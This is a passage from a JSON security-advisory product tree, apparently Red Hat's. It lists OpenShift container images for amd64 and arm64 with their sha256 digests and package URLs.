"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3A8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606131"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3A395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606725"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3Aa97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3Aa116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606385"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-csi-driver-syncer-rhel9@sha256%3A0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557325"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-problem-detector-rhel9@sha256%3A0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557312"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3Aa657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572657"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3A5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-rhel9@sha256%3Af1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775559294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-operator-rhel9@sha256%3A43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557242"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3A6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605177"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3A6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557298"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565214"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3Ae61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564931"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3Ae3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Ab508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3A6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605144"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3Ac2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606817"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3Acd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3Ac180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606351"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3A0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564694"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3A8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572853"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3A1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3A07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3A387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563562"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775629870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3A13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3A50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604398"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3Ad98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3Af434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606841"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606783"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3A4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604596"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3A9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"product": {
